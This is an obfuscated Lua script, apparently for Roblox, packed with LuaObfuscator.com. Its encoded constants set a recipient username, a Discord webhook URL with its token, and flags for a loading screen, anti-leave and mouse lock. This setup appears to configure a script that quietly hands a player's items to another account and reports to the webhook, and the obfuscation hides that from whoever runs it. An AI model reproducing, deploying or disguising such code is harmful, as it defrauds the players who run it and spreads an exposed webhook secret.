--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v90=v5(v82,v19);v19=nil;return v90;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(957 -(892 + 65))) then v84=(v31/((1 + 1)^(v32-(2 -1))))%((3 -(1 + 0))^(((v33-(2 -1)) -(v32-1)) + ((2 -1) -0))) ;return v84-(v84%((138 + 482) -(555 + 64))) ;end end else local v85=0;local v86;while true do if (v85==((1720 -789) -(857 + 74))) then v86=(570 -(367 + 201))^(v32-(928 -(214 + (1308 -595)))) ;return (((v31%(v86 + v86))>=v86) and (4 -3)) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + 2 ;return (v36 * (436 -(67 + 113))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;return (v40 * 16777216) + (v39 * (48199 + 17337)) + (v38 * (1017 -761)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,953 -((2560 -1758) + 150) ,53 -33 ) * (((2 + 1) -1)^32)) + v41 ;local v45=v20(v42,16 + 5 ,1028 -((1618 -703) + 82) );local v46=((v20(v42,(528 -(145 + 293)) -58 )==(1 + 0)) and  -(1 -0)) or (1188 -(1069 + 118)) ;if (v45==(0 -0)) then if (v44==(0 -0)) then return v46 * (0 + 0) ;else local v91=430 -(44 + 386) ;while true do if (v91==0) then v45=1 -0 ;v43=0 + 0 ;break;end end end elseif (v45==(2838 -(368 + 423))) then return ((v44==(0 -0)) and (v46 * (((1505 -(998 + 488)) -(10 + 8))/0))) or (v46 * NaN) ;end return v8(v46,v45-(3934 -2911) ) * (v43 + (v44/((444 -(416 + 26))^(17 + 35)))) ;end local function v25(v47)local v48=0 + 0 ;local v49;local v50;while true do if (v48==2) then v50={};for v92=773 -(201 + 571) , #v49 do v50[v92]=v2(v1(v3(v49,v92,v92)));end v48=1141 -(116 + 1022) ;end if (v48==3) then return v6(v50);end if (v48==(2 -1)) then v49=v3(v16,v18,(v18 + v47) -(4 -3) );v18=v18 + v47 ;v48=1 + 1 + 0 ;end if ((0 -0)==v48) then v49=nil;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=860 -(814 + 45) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=106 -(8 + 98) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v51==2) then v56=nil;v57=nil;v51=881 -(284 + 594) ;end if (v51==1) then v54=nil;v55=nil;v51=3 -1 ;end if (v51==(8 -5)) then v58=nil;v59=nil;v51=170 -(122 + 44) ;end if (v51==(0 -0)) then v52=0;v53=nil;v51=1 -0 ;end if (v51~=(6 -2)) then else v60=nil;while true do if (v52==(6 -4)) then local v98=0 + 0 ;while true do if (v98==1) then v52=1 + 2 ;break;end if (v98==0) then v57=nil;v58=nil;v98=1 -0 ;end end end if (v52==(2 -1)) then local v99=65 -(30 + 35) ;while true do if (v99==(0 + 0)) then v55=nil;v56=nil;v99=1;end if (v99==1) then v52=1 + 1 ;break;end end end if ((8 -5)==v52) then v59=nil;v60=nil;v52=3 + 1 ;end if ((1261 -(1043 + 214))==v52) then while true do if (v53~=(0 -0)) then else local v110=0;local v111;while true do if (v110==0) then v111=0 -0 ;while true do if (v111==(1213 -(323 + 889))) then v53=1 + 0 ;break;end if (v111==(0 -0)) then v54=580 -(361 + 219) ;v55=nil;v111=321 -(53 + 267) ;end end break;end end end if (v53==(1 + 1)) then local v112=413 -(15 + 398) ;while true do if ((766 -(574 + 191))==v112) then v53=985 -(18 + 964) ;break;end if ((0 -0)==v112) then v58=nil;v59=nil;v112=1;end end end if (v53~=(11 -8)) then else v60=nil;while true do local v114=0 + 0 ;local v115;while true do if (v114==(849 -(254 + 595))) then v115=0;while true do if (v115~=0) then else local v117=0 + 0 ;local v118;while true do if (v117~=0) then else v118=850 -(20 + 830) ;while true do if (v118==(0 + 0)) then local v122=126 -(116 + 10) ;while true do if (v122~=(1 + 0)) then else v118=739 -(542 + 196) ;break;end if (v122~=(0 -0)) then else if (v54~=0) then else local v124=0 + 0 ;local v125;local v126;while true do if (v124~=(1 + 0)) then else while true do if (v125==0) then v126=0 + 0 ;while true do if (v126~=(0 -0)) then else local v139=0 -0 ;while true do if ((1551 -(1126 + 425))==v139) then v55={};v56={};v139=406 -(118 + 287) ;end if (v139==(3 -2)) then v126=2 -1 ;break;end end end if (v126~=(1123 -(118 + 1003))) then else v54=1 -0 ;break;end if (v126==(2 -1)) then local v140=377 -(142 + 235) ;local v141;while true do if (v140==(0 -0)) then v141=0;while true do if (v141~=0) then else local v150=0 -0 ;while true do if (v150==(0 + 0)) then v57={};v58={v55,v56,nil,v57};v150=1;end if (v150~=(1 + 0)) then else v141=1;break;end end end if (1==v141) then v126=2;break;end end break;end end end end break;end end break;end if ((0 -0)==v124) then v125=0 + 0 ;v126=nil;v124=1 + 0 ;end end end if (v54==(1 + 0)) then local v127=0 + 0 ;local v128;while true do if (v127==(0 -0)) then v128=0 -0 ;while true do if (v128~=(2 -1)) then else local v130=0 + 0 ;while true do if (v130==(0 -0)) then for v143=754 -(239 + 514) ,v59 do local v144=0 + 0 ;local v145;local v146;local v147;while true do if (v144==(1796 -(503 + 1293))) then local v148=1329 -(797 + 532) ;while true do if (v148==(1 + 0)) then v144=1 + 0 ;break;end if (v148==0) then v145=0 -0 ;v146=nil;v148=1203 -(373 + 829) ;end end end if ((732 -(476 + 255))~=v144) then else v147=nil;while true do if (v145==(1130 -(369 + 761))) then v146=v21();v147=nil;v145=1 + 0 ;end if (v145~=(534 -(43 + 490))) then else if (v146==(1 -0)) then v147=v21()~=0 ;elseif (v146==(3 -1)) then v147=v24();elseif (v146==(11 -8)) then v147=v25();end v60[v143]=v147;break;end end break;end end end v58[862 -(240 + 619) ]=v21();v130=239 -(64 + 174) ;end if (v130==(1 + 0)) then v128=1 + 1 ;break;end end end if (v128~=(0 -0)) then else local v131=0 + 0 ;while true do if (v131==(0 -0)) then v59=v23();v60={};v131=337 -(144 + 192) ;end if (v131~=(217 -(42 + 174))) then else v128=1;break;end end end if (v128==2) then v54=2;break;end end break;end end end v122=1 + 0 ;end end end if (v118~=(4 -3)) then else v115=1 + 0 ;break;end end break;end end end if (v115==(3 -2)) then if (v54~=(1 + 1)) then else local v119=0;local v120;local v121;while true do if (v119==(1505 -(363 + 1141))) then while true do if (v120~=(1580 -(1183 + 397))) then else v121=0 -0 ;while true do local v123=0 + 0 ;while true do if (v123==0) then if (v121==(338 -(10 + 327))) then return v58;end if (v121~=0) then else local v129=0;while true do if (v129~=0) then else for v132=1 + 0 ,v23() do local v133=0;local v134;local v135;local v136;while true do if ((338 -(118 + 220))~=v133) then else v134=0 + 0 ;v135=nil;v133=1;end if (v133~=(1 + 0)) then else v136=nil;while true do if ((1976 -(1913 + 62))==v134) then while true do if (v135~=(0 + 0)) then else v136=v21();if (v20(v136,450 -(108 + 341) ,1 + 0 )==(0 -0)) then local v152=1493 -(711 + 782) ;local v153;local v154;local v155;local v156;local v157;while true do if (v152~=0) then else v153=0 -0 ;v154=nil;v152=1934 -(565 + 1368) ;end if ((471 -(270 + 199))~=v152) then else v157=nil;while true do if ((1 + 0)~=v153) then else v156=nil;v157=nil;v153=7 -5 ;end if (v153==2) then while true do if (v154==2) then local v158=0;while true do if (v158==(1820 -(580 + 1239))) then v154=1664 -(1477 + 184) ;break;end if (v158~=(0 -0)) then else local v163=0;while true do if (v163==(1 -0)) then v158=1 + 0 ;break;end if ((0 + 0)==v163) then if (v20(v156,1,1 + 0 )~=(857 -(564 + 292))) then else v157[2 + 0 ]=v60[v157[1169 -(645 + 522) ]];end if (v20(v156,2,1792 -(1010 + 780) )==(1 + 0)) then v157[14 -11 ]=v60[v157[4 -1 ]];end v163=1837 -(1045 + 791) ;end end end end end if (v154==(2 -1)) then local v159=0 -0 ;while true do if (v159==0) then v157={v22(),v22(),nil,nil};if (v155==0) then local v164=476 -(41 + 435) ;local v165;local v166;local v167;while true do if (v164==(1001 -(938 + 63))) then v165=0 + 0 ;v166=nil;v164=1126 -(936 + 189) ;end if (v164==(2 -1)) then v167=nil;while true do if (v165==(1560 -(1381 + 178))) then while true do if (v166==(0 + 0)) then v167=1613 -(1565 + 48) ;while true do if (0~=v167) then else v157[2 + 1 ]=v22();v157[1142 -(782 + 356) ]=v22();break;end end break;end end break;end if (v165==(267 -(176 + 91))) then local v174=0 + 0 ;while true do if (v174~=0) then else v166=0 -0 ;v167=nil;v174=1 -0 ;end if (v174==(3 -2)) then v165=1093 -(975 + 117) ;break;end end end end break;end end elseif (v155==1) then v157[1878 -(157 + 1718) ]=v23();elseif (v155==(2 + 0)) then v157[3]=v23() -((6 -4)^(54 -38)) ;elseif (v155==3) then local v175=1018 -(697 + 321) ;local v176;local v177;while true do if (v175~=(2 -1)) then else while true do if (v176==(0 -0)) then v177=0 -0 ;while true do if (v177==0) then v157[6 -3 ]=v23() -(2^(7 + 9)) ;v157[6 -2 ]=v22();break;end end break;end end break;end if (v175==0) then local v178=1784 -(214 + 1570) ;while true do if (v178==0) then v176=0 -0 ;v177=nil;v178=1228 -(322 + 905) ;end if (v178==(1456 -(990 + 465))) then v175=1 + 0 ;break;end end end end end v159=1;end if (v159~=(612 -(602 + 9))) then else v154=1191 -(449 + 740) ;break;end end end if (v154~=0) then else v155=v20(v136,2,2 + 1 );v156=v20(v136,876 -(826 + 46) ,953 -(245 + 702) );v154=3 -2 ;end if (v154~=(1 + 2)) then else if (v20(v156,629 -(512 + 114) ,7 -4 )~=(1899 -(260 + 1638))) then else v157[444 -(382 + 58) ]=v60[v157[12 -8 ]];end v55[v132]=v157;break;end end break;end if (v153~=(0 + 0)) then else v154=0;v155=nil;v153=1;end end break;end if (v152==1) then v155=nil;v156=nil;v152=3 -1 ;end end end break;end end break;end if (v134~=0) then else local v149=0;while true do if (v149~=(0 + 0)) then else v135=0 -0 ;v136=nil;v149=1995 -(109 + 1885) ;end if (v149~=(1470 -(1269 + 200))) then else v134=1206 -(902 + 303) ;break;end end end end break;end end end for v137=1,v23() do v56[v137-(1 -0) ]=v28();end v129=816 -(98 + 717) ;end if (v129==1) then v121=1 -0 ;break;end end end break;end end end break;end end break;end if (v119==(0 -0)) then v120=0;v121=nil;v119=1 -0 ;end end end break;end end break;end end end break;end if (v53~=(1 -0)) then else local v113=0 + 0 ;while true do if (v113~=(0 + 0)) then else v56=nil;v57=nil;v113=1 + 0 ;end if (v113==(1691 -(1121 + 569))) then v53=216 -(22 + 192) ;break;end end end end break;end if (v52~=(0 -0)) then else local v100=0;while true do if (v100~=1) then else v52=684 -(483 + 200) ;break;end if (v100==0) then v53=1463 -(1404 + 59) ;v54=nil;v100=2 -1 ;end end end end break;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=2) then if (v80<=0) then v71=v79[3];elseif (v80>1) then v77[v79[2]]=v63[v79[3]];else do return;end end elseif (v80<=4) then if (v80==3) then v77[v79[2]]=v79[3];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80>5) then v77[v79[2]][v79[3]]=v79[4];else v63[v79[3]]=v77[v79[2]];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0E3O00028O0003083O00557365724E616D65030B3O00446F6E7661736B613O3103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132383334303930332O372O3430343738392F50637242452O73777550444A6743325F6C74637457664650666C5F444266356C2O643059455A7643366D36514E5A6857427A4A6431596D45723245474163487A64487561026O00F03F03093O00557365724E616D6532030C3O0050726F5F47616D65722O315303023O005F47030D3O004C6F6164696E675363722O656E2O01027O004003093O00416E74694C6561766503093O004D6F7573654C6F636B00183O0012033O00013O0026043O00080001000100044O00080001001203000100033O001205000100023O001203000100053O001205000100043O0012033O00063O0026043O000F0001000600044O000F0001001203000100083O001205000100073O001202000100093O0030060001000A000B0012033O000C3O0026043O00010001000C00044O00010001001202000100093O0030060001000D000B001202000100093O0030060001000E000B00044O0017000100044O000100012O00013O00017O00",v9(),...);end
